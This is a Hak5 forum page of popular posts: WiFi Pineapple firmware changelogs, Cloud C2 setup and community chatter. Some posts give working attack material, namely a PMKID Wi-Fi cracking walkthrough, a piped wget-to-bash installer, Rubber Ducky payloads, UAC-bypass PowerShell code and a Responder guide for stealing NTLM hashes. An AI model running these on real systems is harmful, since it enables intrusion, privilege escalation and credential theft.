Jump to content


Popular Content

Showing content with the highest reputation since 06/19/2018 in all areas

  1. 10 points
    Hey guys, I'm sincerely sorry for not making a formal announcement when the podcast went on hiatus a few weeks ago. I should have said something - but seeing as Hak5 has been in my life since the beginning - it was too hard to say that I was putting the show on hold. I've been going through a difficult time in my personal life (tl;dr: wedding is canceled) and I wasn't able to do the show the justice it deserves. That said, I'm resilient and new episodes will begin to air on January 2. We're also growing as a team, and we have amazing plans content, products, and community in 2019.
  2. 6 points
    Hi everyone, We just released firmware version 2.5.x for the WiFi Pineapple, vastly improving the PineAP engine. Expect greater results on your next wireless engagement with this release. Changelog 2.5.4: Recon Fixed an issue where scan times would be invalid in non-Chromium web browsers. Changelog 2.5.3: Clients Fixed an issue where SSIDs would not populate. Filters Add detailed Filters information. Setup Choosing the Filter modes is now required upon Setup. Recon Fixed an issue where, in some cases, probes would not be shown in the Recon dialog. Fixed an issue where some probes were not logged during a Recon scan. Fixed an issue where, in some cases, handshakes would not be captured. Fixed an issue where captured handshakes could not be downloaded if the capture had stopped. Fixed an issue where, in some cases, captured handshakes would have invalid frame lengths. Previous scan dates are now translated to the browsers local time. Fixed a rare issue where Live Scan results would not populate in the Web UI. PineAP Fixed an issue where downloading captured handshakes would not work. Changelog 2.5.2: Recon Fixed an issue where invalid results with BSSID 00:00:00:00:00:00 would be collected. Fixed an issue where changing the band to scan would not update until PineAP was restarted. Fixed a firewall issue preventing Live recon results to populate in the Web UI. Changelog 2.5.1: Misc Fix an issue where "Unsupported Device" would incorrectly show. Changelog 2.5.0: Hak5 Cloud C2 Client Update PineAP Rewrite of PineAP, featuring a multitude of improvements and reliability fixes. Recon Improved reliability of scanning. Add throbber for deauth button. Automatically start scan after enabling PineAP. Remove misleading information message when the user started their first scan. Fixed a rare issue where multiple live Recon processes would start. Misc Reduce amount of Web UI HTTP requests. Fix missing paths on the WiFi Pineapple NANO. Download: Over the air via your WiFi Pineapples webinterface, or at https://downloads.hak5.org. ♥ - The Hak5 Development Team
  3. 6 points
    Hi everyone, We just launched the Hak5 Cloud C2! I just wanted to give everyone a heads up and give some basic instructions on how to get everything set up: Setting up the Hak5 Cloud C2 Server To set up the Hak5 Cloud C2 server, simply head over to https://c2.hak5.org, download either the community or professional edition, and wait for an email to arrive with the download link and licence key. Once you have downloaded the ZIP file containing the server, choose the correct version for your OS and architecture (such as linux 64bit), and execute the binary. You will be prompted to add some parameters such as '-hostname'. We recommend setting up the Hak5 Cloud C2 with DNS. Once running, you will have a setup token printed to your terminal. Make a note of that and head over to the configured IP / DNS and port using your favorite web browser (Firefox or Chrome(ium) are recommended). You will be be guided through the setup there, and asked to enter your setup token and licence key. After performing the initial setup, if you need further help, click on the three dots in the top right corner and click on "Help". Update your device firmwares: WiFi Pineapple Update your WiFi Pineapple NANO or TETRA to version 2.4.0 or above, via the webinterface as you do normally Packet Squirrel Visit https://packetsquirrel.com/setup and follow the "Firmware Upgrades" instructions to install firmware version 2.0 or above LAN Turtle Update your LT, LT-SD, or LT-3G by using the "Check for updates" button inside of the turtle shell. Alternatively, follow the manual upgrade instructions from https://lanturtle.com/setup. You'll want to be on version 5 or above to have Cloud C2 support. Provisioning your devices: Once you have updated all of your Hak5 devices, you can go ahead and create new devices in the Hak5 Cloud C2 interface. After doing so, you'll be able to download the device.config files for each device by clicking the device from the list and then clicking the setup button from the device's menu. Once you have the config file, SCP it into the /etc/ folder on your device of choice and reboot the device. You should see it come online in the Hak5 Cloud C2 interface within a few minutes. Please remember that your devices will need to be networked to be able to reach the Hak5 Cloud C2 server (a mistake we made a lot during development). Introducing the Hak5 Cloud C2 video:
  4. 6 points
    PMKID Attack WPA/WPA2 on WiFi Pineapples! Pineapple NANO + TETRA WARNING! This attack is EXTREMELY effective on the Pineapples! And is capable of capturing an entire neighborhood of PMKID's in a minute or less, no clients needed! ONLY use hcxdumptool on networks you have permission to, because of this: hcxdumptool is able to prevent complete wlan traffic! hcxdumptool is able to capture PMKID's from access points (only one single PMKID from an access point required) hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required) hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required) hcxdumptool is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS) hcxdumptool is able to capture passwords from the wlan traffic hcxdumptool is able to capture plain master-keys from the wlan traffic hcxdumptool is able to capture usernames and identities from the wlan traffic This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame. At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)! The main advantages of this attack are as follow: No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack) No more waiting for a complete 4-way handshake between the regular user and the AP No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results) No more eventual invalid passwords sent by the regular user No more lost EAPOL frames when the regular user or the AP is too far away from the attacker No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds) No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID. This attack is quite new, and gets updated regularly. I've compiled it for the Pineapples and uploaded it to GitHub. As the tools gets updated often, i will have to update the packages often. So please check back for updates! Download: hcxtools (v4.2.1-16) Download: hcxdumptool (v4.2.1-17) Download and install both tools automatically by using this command on your Pineapple: wget -qO- https://raw.githubusercontent.com/adde88/hcxtools-hcxdumptool-openwrt/master/INSTALL.sh | bash -s -- -v -v Last update: 06.10.20618 Changelog: Updated hcxdumptool to follow changes from upstream (@ZerBea) Install procedure: Download the IPK's to your Pineapple and install them using opkg. (If you're using the Nano remember to install them to your SD-card) How do i use this? Chose an interface, and make sure it's not being used on anything else, let's use wlan1 in this example! (It will set the interface to monitor mode while working) hcxdumptool -o test.pcapng -i wlan1 --enable_status 3 This will use wlan1 to perform the attack and create a file named test.pcapng containing the PMKID. (You can try other options for --enable_status (1, 2, 4, 16 ?. Use --help for more info) Filters can also be applied with --filterlist and --filtermode (Again, read --help for details) You can then use hcxpcaptool to convert the PMKID to a hash readable by hashcat. hcxpcaptool -z test.16800 test.pcapng The next step would be to transfer test.16800 to a desktop, capable of running the latest version of hashcat. (Version 4.2.0 or higher) And then run the attack, for example like this: (This is NOT done on the Pineapple!!!) hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' Github repo. + source-codes: https://github.com/adde88/hcxtools-hcxdumptool-openwrt https://github.com/adde88/openwrt-useful-tools The first repo. contains the IPK files, and the SDK Makefiles needed to compile the project yourelf. The second repo contains alot of other useful tools i've compiled over time for the Pineapples if you're interested in taking a peek. Donations are very helpful, and would help me contribute towards keeping all of these custom tools ported and up-to-date.
  5. 5 points
    Hi all - First off I want to thank everyone for providing feedback on this release. @Foxtrot will be following up shortly with an update that addresses an issue for those not being able to see probes. We've also come to understand that our filtering documentation has not been as explicit as it could - so we've made an update to that module and the required configuration at time of initial setup. The WiFi Pineapple filtering system limits the scope of engagement by filtering devices by MAC address and network by names in an Allow Mode of targeted devices or network names and a Deny Mode of off-limit devices or network names. Client filters specify which devices, by MAC address, are either explicitly allowed to connect or explicitly denied from connecting. In Allow Mode only the listed MAC addresses are allowed to connect. In Deny Mode, the listed MAC addresses will be prevented from connecting. SSID filters specify the network names to which the WiFi Pineapple will respond. In Allow Mode, devices will only be allowed to associate with the WiFi Pineapple for SSID names listed. In Deny Mode, devices will be prevented from associating with the WiFi Pineapple for the listed SSID names. In the event that both filters are set to deny mode, you will be warned that all devices will be allowed to associate with the WiFi Pineapple for all requested SSID names. I hope this clears up any confusion and once again we appreciate all of the feedback and support.
  6. 5 points
  7. 5 points
    Hi all. I'm just now becoming aware of multiple related situations identified in this thread. I sympathize as no one should be waiting this long on their orders, and I offer my sincerest apologies. Looking deeper into the various issues it seems that most are related to a hazmat shipping situation that has prevented us from selling batteries outside of very limited circumstances (domestic ground shipments only). Unfortunately our logistics provider has been extremely slow to respond in rectifying the situation. For example, some international shipments sent by DHL had been shipped back then repackaged via FedEx. It's extremely frustrating to have high value orders containing multiple units get to the border and be delayed by days if not weeks and incur immense shipping expenses due to one unit. We have since removed all batteries from kits until a better logistics solution can be found. We are also investigating alternative logistics providers to alleviate these response delays. I'm terribly saddened that our plan to use a professional logistics outfit for fulfillment of orders at higher speeds than possible by the small team that is Hak5 has resulted in the exact opposite in these edge cases. It's absolutely unacceptable and I share in your frustration. Furthermore, our support systems have not been adequate to deal with these logistics challenges in a timely manner, and for that I offer my sincere apologies. We are back from defcon, we hear you, and while half of us are hard at work on the next big thing - the rest of the team is dedicated to digging into to each and every support ticket to ensure that you receive exactly what you are due. You will have resolution by the end of the week.
  8. 4 points
    Hi everyone, In an effort to lower the barrier to entry of writing Ducky Scripts even more, our newest addition to the development team @dallaswinger has created a totally self-contained HTML file which acts as a Ducky Script encoder. In addition to supporting all currently available commands the original Java based Duckencoder, this new version also supports different keyboard layouts in the form of the Bash Bunny language files. We will be adding more features to this encoder soon, and are especially looking forward to your feedback. Please leave all suggestions or bug reports in this thread. The jsencoder.html file can be found attached to this post and should be considered to be in beta. If it drinks your coffee, eats your pets, or starts an intergalactic war, please blame @dallaswinger. Note: You currently need an internet connection to load the bootstrap CSS and jQuery JS files. As this is not the final release, we have forgone including them inside of the HTML. jsencoder.html
  9. 4 points
    I'm sure everyone at some point in their life has unplugged something from a Windows machine and heard the notification sound. This is obviously way too robotic and lifeless for my taste; here is a ducky payload that will replace device disconnect sounds with a scream. Just in case you want it to feel like a living thing that is suffering as you rip parts off of it. Inspiration from watching too much Michael Reeves. Requires internet access on the target Windows host; this is just the shortest/fastest way to drop this kind of payload. Other staging/injection techniques could be used to supplement the download. This will open run and execute the .wav download and registry changes in the background. Give it a couple of seconds to download. The change should be made by the time you remove the ducky from the target. DELAY 3000 GUI r DELAY 350 STRING cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' http://h4k.cc/s.wav %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" ENTER This downloads a sample .wav (Doom). Replace the above url with another that hosts the desired .wav if you want to change the sound. Fastest way to encode this would be using our single file JS Duck Encoder: https://downloads.hak5.org/ducky
  10. 4 points
    It is a DC Type-M Barrel (OD:5.50mm, ID: 2.10mm, Center +).
  11. 4 points
    Move out and get a different flat with better room mates.
  12. 4 points
    ♥ - The Hak5 Development Team Changelog 2.2.0 General Fixed an issue where the device LED did not stay illuminated after boot had finished. PineAP PineAP can now imitate enterprise access points, and capture enterprise client credentials. Credentials are displayed in the UI, under the new "PineAP Enterprise" panel. The credential hashes may be exported in either h$ When association passthrough is enabled, clients may associate to the enterprise access point (depending on vendor implementati$ Recon Added the ability to clone an enterprise access point for use with PineAP Enterprise. The clone option can be used via the new encryption dialog, which is accessed via the button in Recon scan results for access p$ Configuration Fixed an issue where factory reset would not work on the TETRA. Clients Enterprise clients are now displayed in the clients list. Fixed an issue where client SSID would always be unavailable. Networking Fixed an issue where the wrong interface may be incorrectly selected under client mode. Download: Over the air, or manually from https://wifipineapple.com/downloads
  13. 4 points
    One thing to help with all the other things. Ducky and bunny integration will be really cool. Great job guys!!!
  14. 4 points
    I'd burn it all down and move house, sounds like they've got you well and truly in their grasp and are unlikely to let go. With pin hole cameras there could be one in every nail and screw head in your apartment and you'd never know unless the doors fell off the cupboards because they used cameras instead of nails, that might give it away. I'd also stay off the Raspberry Pi, did you know that if you sum up the ASCII values of all the letters in the name you get 745 which is the year Kulun Beg died and I think we all know what that means.
  15. 4 points
    Hi everyone, After releasing firmware version 2.3.0 at DEF CON, I hadn't gotten around to creating a forum thread of it yet. As usual, please leave all feedback in this thread. ♥ - The Hak5 Development Team Changelog 2.3.1: Recon Fixed an issue where timed recon scans would fail the first time around. Fixed an issue where the stop handshake capture button would persist after a capture had completed. Changelog 2.3.2 Recon Fixed an issue where performing recon scans would lock up all further PineAP actions. Changelog 2.3.0: Recon Added the ability to capture WPA Handshakes by clicking on the arrow next to a WPA / WPA2 encrypted network. Fixed an issue where multicast MAC addresses were shown as clients to wireless networks. PineAP Fixed an issue where PineAP would remain running when the wlan1mon interface had been removed, causing confusion. Filters Fixed an issue where some combinations of filters did not apply correctly. Logging Fixed an issue where non-completed associations were logged as completed. General Fixed an issue where notifications would show invalid timestamps in Firefox. Fixed an issue that prevented the timezone set during initial Setup from persisting across reboots. Download: Over the air via your WiFi Pineapple's webinterface, or at https://wifipineapple.com/downloads
  16. 3 points
    Hi everyone! Inspired by the "Making Windows scream when you unplug devices" payload, I was thinking of other fun payloads you can do with the Rubber Ducky. Lately, a co-worker of mine showed me how you can play music with powershell and after I've seen that, I just had to make a payload with this feature. For those who aren't aware of, you can use "beep" commands with powershell which will, when executed, play a tone. If you want to try it yourself, just open powershell and execute the following commmand: [console]::beep(500,300) When executed, you will hear a short "beep". You can find further information on the powershell beep command here: https://devblogs.microsoft.com/scripting/powertip-use-powershell-to-send-beep-to-console/ So now we can make our own music using powershell. Luckily, there are already some tracks available such as "The Imperial March (Star Wars)" or "Mission Impossible". When I saw this, I just had to make a Rubber Ducky payload out of this. So every time you plug in the Rubber Ducky, it will execute the powershell script and play the Star Wars Imperial March. Here is the payload: DELAY 3000 GUI r DELAY 250 STRING powershell DELAY 250 ENTER DELAY 500 REM Hide the powershell window STRING Add-Type -Name W -Names C -M ' ENTER STRING [DllImport("Kernel32.dll")] ENTER STRING public static extern IntPtr GetConsoleWindow(); ENTER STRING [DllImport("user32.dll")] ENTER STRING public static extern bool MoveWindow(IntPtr h, int X, int Y, int W, int H);' ENTER STRING [C.W]::MoveWindow([C.W]::GetConsoleWindow(),0,0,-1,-1); ENTER REM Play the Imperial March STRING [console]::beep(440,500);[console]::beep(440,500);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(698,350);[console]::beep(523,150);[console]::beep(415,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);exit ENTER Of course one should be able to loop this so the song will keep playing, but I'll leave that up to you guys 🙂 I know it's a kinda meaningless but fun payload, so I hope some of you will enjoy it! - zSec
  17. 3 points
    Hi! We just released 2.5.4, which on top of 2.5.3, addresses a few issues that have been reported since the launch of 2.5.2 (thank you!). Catch the change log in the first post and upgrade via the WiFi Pineapple OTA or via the Download Center.
  18. 3 points
    Good luck with that. We're not going to help you hack your girlfriend's iPhone.
  19. 3 points
    function sudo { $command = "powershell -noexit " + $args + ";#"; Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command ; schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I; Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" } Quick function that works like sudo 🙂
  20. 3 points
    Here you go, new version. @Darren Kitchen @lokiuox https://github.com/PoSHMagiC0de/Invoke-TaskCleanerBypass It uses dynamic parameters and can take in the standard posh base64 encoded commands or a file location of your script. As far as the bypass thing. Just run it as an encoded command. Better yet, here is a good way to launch it. 😛 Just create a encoded stager to downloadstring the bypass script from web server and execute with "Invoke-Expression" IEX for short with the command. You probably can take this function, add after it the command to run it with your parameters and encode the whole thing to run. No bypass to execution policy needed. Anyway, look at the script. Some modifications were needed to the reg hack. I needed to use cmd /c in front so I could escape the appended stuff that gets added when ran like the cleaner command. That was breaking the exploit. So the new reg entry is cmd /c yourpayload & :: That runs the command and then rems out whatever else is there. SQL injection for registries. 😛 Since I won the competition this month so I am not payloading this. Someone else can run with this and create a BB payload. I know a few ways to use it but someone else can have a turn. FYI: It checks if you have Win10, member of local admins and already UAC bypassed. Will run if bypassed, will do nothing if not on 10 or greater and/or not a local admin.
  21. 3 points
    I found this the other day and thought if some of oyu haven't seen it, you might find it interesting. I have yet to test it myself but plan to soon. Hachcat PMKID
  22. 3 points
    After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues. Here's our fix! (we take no responsibility if you break something/somebody. Only hack when you have prior approval and authorization!) Factory reset, or push the turtle-5.bin firmware to reset (probably need to upgrade to v5 anyway). This makes sure you are set to base. YMMV. Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine ssh in to, sh3llz, change password Update the modules list Only install QuickCreds for now, so we have enough space Select QuickCreds and configure Let it install it's dependencies You can now set QuickCreds to 'Enable' so that it will start at boot DO NOT REBOOT YET! At this point, we're going to exit and git clone the responder package DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF Exit 'turtle' back to a basic root shell Git clone the Responder package first to /tmp since there is plenty of space. git clone git://github.com/lgandx/Responder /tmp/Responder BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp du -sh /tmp/Responder 3.8M rm -rf /tmp/Responder/.git rm -rf /tmp/Responder/tools/MultiRelay/ du -sh /tmp/Responder 450.5k We also want to remove the git package as it takes up >1MB of space. QuickCreds installs it /only/ to git the Responder package 😕 opkg remove git df -h 1.2M available on / Move the Responder package back to /etc/turtle/ for QuckCreds to find it mv /tmp/Responder/ /etc/turtle/ df -h 1.1M still available on / now (w00t) The QuickCreds module is hardcoded to use br-lan as the interface. This doesn't exist, so we need to change it to eth0. Another 😕 sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!! Copy and paste the hash from /root/loot/#/HTTP-NTLMv2- Paste into a hash file and send it to john with a wordlist john hash.txt --wordlist=wordlist.txt Testing shows this works whether the laptop is locked or not locked. These hashes can not be replayed, only cracked. You still have plenty of space to return to the turtle shell and install any other modules you need at this point. You may need git for something else, but probably not enough space. This set up is for the "Grab creds from a locked Workstation" scenario. You may need MultiRelay for something else...? Not needed for QuickCreds. ENJOY!
  23. 3 points
    It would be awesome if I could manage my wifi pineapples modules/payloads from cloud C2. Obviously this would be true of the other supported devices as well.
  24. 3 points
    This isn't quite right. Blue text for MAC addresses is an indicator that the MAC may be randomised by the discovered device. You can see more detail if you hover over that text. Out of Range clients are stations that your Pineapple has seen previously but is now no longer seeing any probes for.
  25. 3 points
    Best idea, get someone in who knows what they are doing. If you are having to ask on a forum about how to conduct a pen test, especially one that has anything to do with ebanking, then you really shouldn't be doing it. I know this sounds harsh and everyone has to learn, but this is not the environment to learn in, you mess up here and you could leave the company open to attack despite your report saying they are secure. I'd find someone who knows what they are doing, get them to do the job, and shadow them to learn from them. Do this a few times and then start to take a more active role with the second person watching what you are doing. It will take a while but you'll get to the point where you can do a test that will give the client what they actually need.
  26. 3 points
    Hi, did you purchase the tactical edition? If so, those antennas are designed to be that way when you put it into the pouch.
  27. 3 points
    Yes, no, possibly and maybe. Yes, it will protect at least some of your network traffic as it goes from your device through to the FastestVPN server, at that point, the server decrypts the traffic and sends it on its way. That is what is mean by between the end points, you to them, what happens from them onwards depends on the type of traffic you are sending. This should at least get your traffic through the Chinese firewall. No, the Chinese have some very strict rules in place and may block the VPN or mess with the traffic in order to be able to decrypt what they see, for example swapping out encryption certificates. When doing this, if the client has been written correctly, it should warn you that something bad is happening so you will be able to make a decision as to what to do. Possibly, without knowing something about how FastestVPN works, it isn't possible to say how well they configure the service, done well and all your traffic should go across the VPN, done badly and all sorts could leak out around it. Maybe, without fully testing it in an environment where you can monitor exactly what is going on then it isn't possible to know for sure. Something to remember, if you are using public wifi and they have a captive portal (a web login page), then you'll probably need to have the VPN off to reach it meaning all your traffic is flowing in the clear till you've logged in. Also consider "Evil Maid" attacks and general surveillance. A VPN is good, but a camera pointed at your screen watching everything you do will defeat the protections to a degree.
  28. 3 points
    Starting to think we need a creative writing section on the forums...
  29. 3 points
    Hi, Here is the solution; The problem is there is a file missing because of that procps service cannoty be started, here is how to fix it; cp /lib/systemd/system/bak/systemd-sysctl.service /lib/systemd/system ln -s /lib/systemd/system/procps.service /etc/systemd/system/procps.service Now you are good to go...
  30. 3 points
    Sorry, buddy. No one here is going to help you hack into your dad's router just so you can play games or watch videos without doing your chores. We all need to do our chores, otherwise bad things happen.
  31. 3 points
    If your boss won't listen to "it's illegal" tell him "it's not possible", he can't force you to do it if you don't know how. If it's your fair, you set the rules ban any recording devices.
  32. 3 points
    ♥ - The Hak5 Development Team Changelog 2.2.0 General Fixed an issue where the device LED did not stay illuminated after boot had finished. PineAP PineAP can now imitate enterprise access points, and capture enterprise client credentials. Credentials are displayed in the UI, under the new "PineAP Enterprise" panel. The credential hashes may be exported in either h$ When association passthrough is enabled, clients may associate to the enterprise access point (depending on vendor implementati$ Recon Added the ability to clone an enterprise access point for use with PineAP Enterprise. The clone option can be used via the new encryption dialog, which is accessed via the button in Recon scan results for access p$ Configuration Fixed an issue where factory reset would not work on the TETRA. Clients Enterprise clients are now displayed in the clients list. Fixed an issue where client SSID would always be unavailable. Networking Fixed an issue where the wrong interface may be incorrectly selected under client mode. Download: Over the air, or manually from https://wifipineapple.com/downloads
  33. 3 points
    Or......... Don't make things that are malicious in nature.
  34. 3 points
    We were all there actually. You'll see us for a split second. We got to set up our entire defcon booth for the movie.
  35. 3 points
    Hi everyone, We have just released firmware v2.1.1 with a whole bunch of bugfixes. Please see the first post of this thread for more details.
  36. 2 points
    Hi friends, I don't have time for this yet. I will fix the bug as soon as I can.
  37. 2 points
    ## Use powershell -ep byppass .\script.ps1 to launch ## ## Fixed an issue where if there are spaces in the script path. ## ## Added option for interactive window, comment out the code to change back to hidden ## ## Current example below opens and Admin powershell window ## if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator powershell.exe } else { $registryPath = "HKCU:\Environment" $Name = "windir" #Use for hidden window #$Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#" #Use for interactive window $Value = "powershell -ExecutionPolicy bypass -Command `"& `'$PSCommandPath`'`";#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Fixed an issue with spaces in the script path.
  38. 2 points
    @Forkish Yes you could use kismet, Horst, tcpdump etc and look for activity. But the OP wanted a walk around site tool. - I have only used Pisavar on my tetra and nano to find each other. It did what it said it would do. Also, I like the idea of using a pineapple to run pineapple hunting tool 😄 https://github.com/WiPi-Hunter To name names in the forum start with the @ then start typing the name and a drop down list below will start suggesting matches.
  39. 2 points
    So I got a Nano from a friend and had firmware 1.X.X running for a while and everything was working besides the fact the spoofed ssids didn't provide wifi. After poking around I realized my firmware was very out of date so I did the updated to 2.4.2. Now it seems like everything is just broken. CPU is pegged at 100% almost all the time, even when nothing is running. PineAP hasn't captured a single SSID even though 20 minutes ago while running the other firmware I had about 25. Just to make sure I wasn't just being impatient I let it run for 12 hours. Still nothing. So far for troubleshooting I've tried factory resetting the device (2x), ran my laptop with just wifi as well as with ethernet, ran the wp6.sh script and confirmed all the interfaces were correct. At this point I'm starting to wonder if maybe I'm just doing something wrong? Has anyone had these kind of issues? If so, how did you fix it? Side note, I'm using Ubuntu, not sure if that matters.
  40. 2 points
    I can personally confirm that the tactical antennas are supposed to do that by design. They do tend to "stay up" on their own if you balance them but they're not *supposed* to lean in a specific direction.
  41. 2 points
    I'd be remiss if I failed to start this topic with the following: Great Job Hak5 dev team! I saw the mention of a road map so it's likely you've thought of these already but just in case here is my feature wish list: Definable device phone home URI for use with HTTPd proxy-pass More granular control over server config HTTPS port other than 443 Select existing TLS certs in lieu of creating new Let's Encrypt certs Option for client cert authentication to the dashboard Option to output config files for HTTPd of choice (Apache, Nginx, Lighttpd, etc.) CloudC2 as a Tor hidden service Device OpenVPN call home to C2 If there are already ways to do all or some of the above please let me know ? Again fantastic work thus far!
  42. 2 points
    I have also updated my simple button script so that it stores captured data to /pineapple/modules/PMKID/capture, you can then use g0blin's module to view the data. #!/bin/bash #PixL file="/tmp/handshake" capture="`head -30 /dev/urandom | tr -dc "0123456789" | head -c3`" if [ -f "$file" ] then killall hcxdumptool led YELLOW off rm -rf /tmp/handshake hcxpcaptool -z test.16800 test.pcapng > test.conlog mv test.pcapng /pineapple/modules/PMKID/capture/$capture mv test.16800 /pineapple/modules/PMKID/capture/$capture.16800 mv test.conlog /pineapple/modules/PMKID/capture/$capture.conlog mv test.log /pineapple/modules/PMKID/capture/$capture.log else touch /tmp/handshake led YELLOW on hcxdumptool -o test.pcapng -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > test.log & fi
  43. 2 points
    You need to lay off whatever it is you're taking...
  44. 2 points
    Yeah, we are definitely not helping with that.
  45. 2 points
    After sharing an internet connection with the bash bunny, and then ssh-ing in, the following seemed to work for me when updating the bunny: apt-get update apt-mark hold procps apt-get upgrade When apt-get then listed out what it was going to upgrade, it showed procps as not being upgraded.
  46. 2 points
    No worries ! I worked on this the all day and fixed a few other things here and there. I now have the nat-simple, nat-full and eaponly attacks implemented. Just so that you know, I forked both your hostapd-mana and ManaToolkit repos to keep track of my modifications. All changes are only local on my laptop for the moment but I will keep you updated once it is online. Maybe you will be interested to have a look on the multiple attack scripts. Again, thanks a lot for the heavy lifting work!
  47. 2 points
    seeing as the pineapple is for wifi and not gsm/cdma then Im going to go with, not possible.
  48. 2 points
    It runs!!!! sweet job ? I haven't tried to use it yet I just ran "wifiphisher --help". will try and make some time to take a closer look. clone the repo to pineapple, install all the ipk files using "opkg update && opkg install *.ipk" (internet required on pineapple) once finished clone original wifiphisher (until zylla has something tweaked for pineapples) to the wifiphisher directory for example. Browse to said folder and run "python setup.py install" once finished you should be able to type "wifiphisher --help" to see options. Not sure its 100% working yet but at least it runs!!!! ? Thanks @Zylla fun times ?
  49. 2 points
    Well....As of this moment i've compiled every single dependency (i think i've gotten em' all...) They can be found at https://www.github.com/adde88/openwrt-useful-tools/ Inside the repo. there's a folder named wifiphisher-openwrt which contains the IPK's for the dependencies, as well as the wifiphisher directory. (it contains the same files as the main wifiphisher repo.) For people experienced with python and developing i recommend you test it, and try to work out the errors as they show up. Wifiphisher relies alot on NetworkManager, which doesn't exist on the Pineapples. So some code needs to be re-written, for example alowing it to use iwconfig to handle the interfaces, etc. But yeh. Dependencies are now fixed ? I'll update the wifiphisher folder with my own code when/if i get something working. ?
  50. 2 points
    Introduction: This process requires an Android phone capable of running the EasyTether app which can be downloaded here: http://www.mobile-stream.com/a/easytether-device.apk and also possibly an SD card. The Lite version of the app prevents https & udp connection, so to use those you have to pay mobile stream $10 once, which I still think is better than paying your carrier that every month. I do not endorse tethering data without your carrier's permission, proceed at your own risk. I am currently working on a module that will automate this process, if you can't figure out this tutorial you can wait for that or contact me. Setup on Android: Download and install the EasyTether app and follow the in-app instructions for setting up USB Tethering. Setup on the Pineapple: You will need to install EasyTether for Openwrt located here: http://www.mobile-stream.com/easytether/drivers.html I used the OpenWrt 15.05 --openssl which I show being downloaded below. NOTE: You may need an SD card for this as it is a larger file. The below commands assume you have an SD card set up correctly. If you do not with to install to your SD card ignore the --dest sd options below and know that it may not work. root@Pineapple:/sd# wget http://www.mobile-stream.com/beta/openwrt/easytether-usb-openssl_0.8.5-1_openwrt-15.05-rc3.zip Once you downloaded the package, install unzip so you can open the previously downloaded compressed package. (BTW if anybody knows the the two errors at the bottom are let me know, to my knowledge they do not effect the packages being installed. My assumption is that opkg is searching in /usr when it should be looking in /sd/usr). root@Pineapple:/sd# opkg install unzip --dest sd Installing unzip (6.0-3) to sd... Downloading https://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/packages/unzip_6.0-3_ar71xx.ipk. Configuring unzip. grep: /usr/lib/opkg/info/unzip.control: No such file or directory cat: can't open '/usr/lib/opkg/info/unzip.list': No such file or directory Then unzip the EasyTether application. root@Pineapple:/sd# unzip easytether-usb-openssl_0.8.5-1_openwrt-15.05-rc3.zip Then cd to the correct application distribution. root@Pineapple:/sd# cd 15.05-rc3/ar71xx/generic/ Then install the application! root@Pineapple:/sd/15.05-rc3/ar71xx/generic# opkg install easytether-usb-openssl_0.8.5-1_ar71xx.ipk --dest sd After that you can run the application (you do not need to be in any specific directory anymore) root@Pineapple:/sd/15.05-rc3/ar71xx/generic# easytether-usb Now control-C because the Pineapple doesn't have Internet just yet, you need to configure it to allow Internet sharing from Android by running the below command (all the lines at once). cat << EOF >> /etc/config/network config interface 'wan' option ifname 'tap-easytether' option proto 'dhcp' EOF You should be all set and see "Connection Established" if you followed the Android instructions correctly and have Internet on your Pineapple! If you need more help ask me or read MobileStream's tutorial. Good luck guys!
  • Create New...